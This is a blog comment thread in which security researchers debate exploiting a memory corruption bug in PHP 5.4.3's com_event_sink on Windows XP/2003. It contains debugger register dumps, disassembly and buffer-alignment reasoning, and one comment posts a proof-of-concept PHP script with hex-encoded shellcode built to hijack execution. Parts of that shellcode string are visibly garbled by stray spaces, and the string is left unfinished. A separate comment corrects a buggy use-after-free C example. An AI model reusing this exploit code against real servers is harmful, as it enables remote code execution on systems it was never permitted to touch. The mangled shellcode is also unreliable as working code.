Blog Comments

  1. leeladitya
    good work rahul bhai keep it up
    Updated 02-26-2017 at 01:47 AM by leeladitya
  2. neo
    Our good friend [S] had also suggested which shows the qmail program to be vulnerable to ShellShock.
  3. fb1h2s
    @liw thanks man, that was useful. I was planning to update DNS stuff.
  4. liyw
    Updated 09-26-2014 at 12:19 AM by liyw
  5. cipher
    Awesome! Great writeup, keep hacking and keep posting fb1
  6. [s]
    Yes, XSS played the main role in the phishing. One more way I've seen which is floating over everyone's emails and spreading mass

    The following phishing code was found in some audits.

    Note: the above code is only for educational purposes.
  7. fb1h2s
    Well, while attending the talk I was wondering how I knew the talk even before, and I was like it might be another déjà vu.
  8. cons0ul
  9. webdevil
    Vinnu discussed this a while ago on the forum. Go Vinnu go!

    And thanks for the slides!
    Updated 03-08-2013 at 10:59 AM by webdevil
  10. 41.w4r10r
    A few months back we discussed something similar here
  11. fb1h2s
    Damn, sorry I didn't respond to this, will make the changes; currently busy with some presentation slides.
  12. fb1h2s
    Well, in that case let's be productive: we'll pick some other bug which is not public and try to make an exploit out of it, what say.
  13. Rashid bhatt
    hello brother

    We only need to know the buffer base address; edi is not required because edi by default points towards the buffer. Moreover, the kind of spray you are doing is not effective: in the case of this exploit the heap has to be sprayed at 4-byte boundaries, and at the same time we don't know if our $buffer will be aligned at an odd or even byte boundary.

    Also, when you use the JMP EDI trampoline your heap spray will definitely contain instructions which might have bad side effects! Anyways... let's work together on converting this exploit into an address disclosure bug!

  14. fb1h2s
    Hi bro, that was helpful, thanks for letting me know there is an alternate way to solve this.
    When I started, my aim was to make the code work on Win XP and 2003 [the majority of PHP servers] {irrespective of service packs, obviously} platforms, and when I first looked at the crash the first thought was to use a heap spray to achieve this. Maybe coz of the style I follow, so that u don't need to hardcode any address, making it reliable.

    The major issue with ur method is u need to know the exact address of the following
    2) buffer's base address

    and these two would vary even on each service pack?
    Correct me if I am wrong or if you are able to solve that some way; let's keep this healthy discussion up.
  15. Rashid bhatt
    Hello,

    See, this is where things go wrong

    ============ module php5ts.dll =====================
    102F59BD 8B06 MOV EAX,DWORD PTR DS:[ESI] << we control esi VARIANT(ESI) <<
    102F59C2 51 PUSH ECX
    102F59C3 53 PUSH EBX
    102F59C4 53 PUSH EBX
    102F59C5 56 PUSH ESI
    102F59C6 FF50 10 CALL DWORD PTR DS:[EAX+10] << this is the place we can control EIP

    Now, if we put a break-point at 0x102F59BD, EDI happens to point towards the $buffer variable

    EAX 00000000
    ECX 003628E8
    EDX 0110DD78
    EBX 00000000
    ESP 00C1F9F8
    EBP 00C1FA4C
    ESI 0110D410 << this is what we can control using VARIANT
    EDI 0110D410 <<< $buffer

    EIP 102F59BD php5ts.102F59BD
    C 0 ES 0023 32bit 0(FFFFFFFF)
    P 1 CS 001B 32bit 0(FFFFFFFF)
    A 0 SS 0023 32bit 0(FFFFFFFF)
    Z 1 DS 0023 32bit 0(FFFFFFFF)
    S 0 FS 0038 32bit 7FFDE000(FFF)
    T 0 GS 0000 NULL
    D 0
    O 0 LastErr ERROR_SUCCESS (00000000)
    EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
    ST0 empty 1.#QNAN00000000000000

    $vVar = new VARIANT(0x0110D410); << (this address might vary on your system) make it the same as EDI

    Now I have aligned the buffer in such a way that it will contain data in the following fashion

    $buffer = "buffer_base" . "JUNK 12 BYTES" . "buffer_base + 10(hex)" . " SHELLCODE";

    Here, at MOV EAX,DWORD PTR DS:[ESI], as we control ESI we can load EAX with the base address of $buffer, because [$buffer] = buffer_base

    Later it happens to call a function at offset +10 from [eax], which in our buffer alignment points towards the shellcode...

    PS: Because the author of this exploit has already assumed that DEP/ASLR are turned off by default on the testing machine, this exploit is not likely to work on systems running such protections.

  16. fb1h2s
    Thanks for sharing the code and for showing interest in the work.

    But pardon me, am not getting what ur talking about, how u were able to get code execution.

    In our case

    $vVar = new VARIANT(0x0110D410); // We control this

    is not used directly for EIP, but it's the [ dword ptr [esi] ].

    Here is the debugging output from the code u shared.

    Can u share the debugging output here please?

    Thanks again, looking forward to more fruitful discussion on this.

    (ac0.ac4): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00000000 ecx=00372ac8 edx=0114d9e0 esi=0110d410 edi=0114f230
    eip=102f59bd esp=00c1f988 ebp=00c1f9dc iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\wamp\bin\php\php5.4.3\php5ts.dll -
    102f59bd 8b06 mov eax,dword ptr [esi] ds:0023:0110d410=????????
    0:000> u
    102f59bd 8b06 mov eax,dword ptr [esi]
    102f59bf 8d4dd4 lea ecx,[ebp-2Ch]
    102f59c2 51 push ecx
    102f59c3 53 push ebx
    102f59c4 53 push ebx
    102f59c5 56 push esi
    102f59c6 ff5010 call dword ptr [eax+10h]
    102f59c9 8b45d4 mov eax,dword ptr [ebp-2Ch]

    My tests were done on:
    C:\wamp\www\phpbugs>php.exe -v
    PHP 5.4.3 (cli) (built: May 8 2012 00:51:31)
    Copyright (c) 1997-2012 The PHP Group
    Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
    with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans

    WinXP SP3
  17. Rashid bhatt
    hello brother,

    I think you got me wrong; when I said "you are not bypassing ASLR & DEP" I knew that the exploit was not meant for environments other than WinXP/2003. I thought, why was spraying necessary when we can be precise in offsets?

    anyways, here is the POC without spraying

    And listen bro, I believe it's quite possible that this vulnerability can be turned into an address disclosure bug! We need to talk about it, contact me.

    //$bu = str_repeat("B", 10);
    $buffer = "\x10\xD4\x10\x01". "aaaaaaaa" . "aaaa" . "\x24\xd4\x10\x01" ."\xfc\xbb\x9d\x12\x3c\x8d\xeb\x0c\x5e\x56\x31\x1e \x ad\x01\xc3" .
    "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x44\xf9\ x a7\x54\x02" .
    "\xda\x23\x57\x38\x90\xbb\xa9\x75\xb1\xc8\xbb\xb5\ x b1\xb9\x37" .
    "\x3e\xb3\x59\xc3\x06\x34\xe9\xad\xa6\xcf\xdb\x69\ x e9\xd7\x56" .
    "\x79\xac\xe6\x49\x82\xaf\x89\xe2\x11\x0b\x6e\x7e\ x ac\x6f\xe5" .
    "\xd4\x07\xf7\xf8\x3e\xdc\x4d\xe3\x35\xb9\x71\x12\ x a1\xdd\x45" .
    "\x5d\xbe\x16\x2e\x5c\x2e\x67\xcf\x6e\x6e\x74\x83\ x 15\xae\xf1" .
    "\xdc\xd4\xe0\xf7\xe3\x11\x15\xf3\xd8\xe1\xce\xd4\ x 6b\xfb\x84" .
    "\x7f\xb7\xfa\x71\x19\x3c\xf0\xce\x6d\x18\x15\xd0\ x 9a\x17\x21" .
    "\x59\x5d\xcf\xa3\x19\x7a\x13\xd5\x62\x30\x23\x3c\ x b1\xbc\xd6" .
    "\xb7\xfb\xd7\x96\x86\xf5\xcb\xf4\xfe\x95\xeb\x07\ x 01\x20\x56" .
    "\xf3\x45\x4d\x81\x19\xca\x35\x2d\xf9\x7f\xd2\xc0\ x fe\x7f\xdd" .
    "\x54\x45\x88\x4a\x0b\x29\xa8\xcb\xbb\x82\x9a\xe5\ x 5f\x8c\xaf" .
    "\x8a\xfa\x3e\xd8\x31\x21\xb4\x51\x2f\x7f\x37\x34\ x b4\x09\x05" .
    "\xe7\x0f\xa1\x2b\x45\xcc\x35\x37\x72\x7e\xd2\x26\ x 85\x81\xdd" .
    "\xc0\x16\x06\x7a\x30\x81\x97\x1d\x55\x13\x30\xaf\ x f0\xe0\xb3" .
    "\x1e\x21\x8e\x68\x45\xdf\x06\x73\xed\x87\x38\x54\ x ce\x5f\x74" .
    "\xc7\x48\xbe\xee\x95\x3b\xad\xce\x31\xab\x01\x2f\ x a4\x5b\x11" .
    "\x4a\x44\xf0\x90\x5d\x1c\x44\xf6\x4d\x94\xb4\xc7\ x bf\xf4\x65" .
    "\x76\x12\x06\x59\x49\x52\xa8\xa5\xfc\x5a\x49\x5a\ x fe\x5a\x49" .

    $vVar = new VARIANT(0x0110D410); // We control this
    $vVar2 = new VARIANT(0xbadc0de); //

    com_event_sink($vVar, $vVar2 , $buffer );

  18. Rashid bhatt

    Good article of course, but you made some big mistakes in your program, no offence please

    The code given above in your post about the use-after-free sample bug is as follows

    #include <stdio.h>
    #include <stdlib.h>
    int main(void)
    {
        char *ch_ptr = malloc(100);   /* 100-byte heap allocation */
        int i;
        for (i = 0; i < 99; i++) {
            ch_ptr = 'A';             /* assigns to the pointer itself, not to *ch_ptr */
            free(ch_ptr);             /* the free inside the loop that the post describes */
        }
        printf("%s\n", ch_ptr);       /* pointer used again after the free */
    }



    And you say "Here at line 3 char_ptr is allocated a 100 bytes heap and later inside the for loop at line 8 the heap is deallocated. And at line 9 the de referenced pointer is called again. So this will trigger a memory corruption as follows."


    First of all

    ch_ptr = 'A'; is a blunder!

    ch_ptr is not a char variable, it's a char pointer, so by doing that you are not changing the value of what ch_ptr points to but the pointer itself

    free(ch_ptr); and freeing an invalid heap or memory location will result in a crash

    Again you say "And at line 9 the dereferenced pointer is called again", but in reality you are not dereferencing the pointer; we dereference a pointer with the dereference operator *. So it should be something like *ch_ptr if it's %c.
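    As an added example (not code from the thread), here is the sample rewritten the way the critique above asks for: the buffer is filled through the pointer (ch_ptr[i], i.e. *(ch_ptr + i)) rather than by assigning to the pointer, it is freed exactly once, and the pointer is nulled afterwards so any later use faults deterministically instead of silently reading freed memory. The function names are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Allocates n bytes and fills them through the pointer: ch_ptr[i] is
 * *(ch_ptr + i), which is what "ch_ptr = 'A'" in the quoted sample never
 * touched (that line overwrote the pointer itself with the integer 65). */
char *make_filled_buffer(size_t n, char fill)
{
    char *ch_ptr;
    size_t i;
    if (n == 0)
        return NULL;
    ch_ptr = malloc(n);
    if (ch_ptr == NULL)
        return NULL;
    for (i = 0; i + 1 < n; i++)
        ch_ptr[i] = fill;
    ch_ptr[n - 1] = '\0';   /* terminate so printf("%s") stays in bounds */
    return ch_ptr;
}

/* Frees the block and nulls the caller's pointer: a later *ch_ptr becomes a
 * deterministic NULL fault instead of a silent read of freed heap memory. */
void release_buffer(char **pp)
{
    free(*pp);
    *pp = NULL;
}

/* Same flow as the quoted sample, with the use placed before the single free.
 * Returns 1 when the buffer held 99 'A's and the pointer was nulled after free. */
int uaf_fixed_demo(void)
{
    char *ch_ptr = make_filled_buffer(100, 'A');
    int ok;
    if (ch_ptr == NULL)
        return 0;
    ok = (strlen(ch_ptr) == 99 && ch_ptr[0] == 'A' && ch_ptr[98] == 'A');
    printf("%s\n", ch_ptr);   /* use while the block is still live */
    release_buffer(&ch_ptr);  /* free exactly once; freeing in the loop was the invalid free */
    return ok && ch_ptr == NULL;
}
```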
  19. fb1h2s
    The PoC was made for WinXP | 2003 environments. And I don't know why u asked that question? Anyway, in the current scenario, if u check the instruction, a spray was necessary to attain code execution.

    Feel free to put up a PoC without spraying.

  20. Rashid bhatt

    If you are not bypassing ASLR & DEP why do we need to spray?
